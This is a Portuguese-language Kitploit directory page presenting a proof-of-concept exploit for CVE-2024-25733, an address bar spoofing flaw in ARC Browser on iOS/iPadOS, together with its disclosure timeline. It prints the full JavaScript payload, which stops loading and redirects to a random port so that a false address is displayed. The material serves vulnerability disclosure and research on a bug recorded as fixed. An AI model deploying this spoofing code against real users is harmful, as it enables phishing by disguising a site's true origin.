Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ARC-Browser-Address-Bar-Spoofing-PoC — Prova de conceito de exploit para CVE-2024-25733 demonstrando falsificação da barra de endereço no ARC Browser em iOS/iPadOS usando manipulação de navegação baseada em JavaScript. | Kitploit
Ferramentas/GitHubGitHub/hackintoanetwork/arc-browser-address-bar-spoofing-poc
Segurança iOSAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Móvel
GitHubhackintoanetwork/arc-browser-address-bar-spoofing-poc

ARC-Browser-Address-Bar-Spoofing-PoC

Prova de conceito de exploit para CVE-2024-25733 demonstrando falsificação da barra de endereço no ARC Browser em iOS/iPadOS usando manipulação de navegação baseada em JavaScript.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
62há 2 anosAinda não revisado
Compartilhar

Spoofing da Barra de Endereços do ARC Browser - iOS/iPadOS (CVE-2024-25733)

PoC de Spoofing da Barra de Endereços do ARC Browser - iOS/iPadOS

PoC do Exploit (Proof of Concept)

root@kitploit:~
<script>
    function spoof() {
        setTimeout(() => {
            window.stop();
            let randomPort;
            do {
                randomPort = Math.floor(Math.random() * 1000);
            } while (randomPort === 0 || randomPort === 443);
            document.location = "https://google.com:" + randomPort + "/";
        }, 300);
    }
    spoof();
</script>

DEMO

PoC.mp4

Linha do Tempo

  • 2024-01-25 : Vulnerabilidade reportada à The Browser Company of New York
  • 2024-01-25 : Reconhecida como vulnerabilidade de segurança
  • 2024-02-13 : Corrigida na versão mais recente
Baixar ferramenta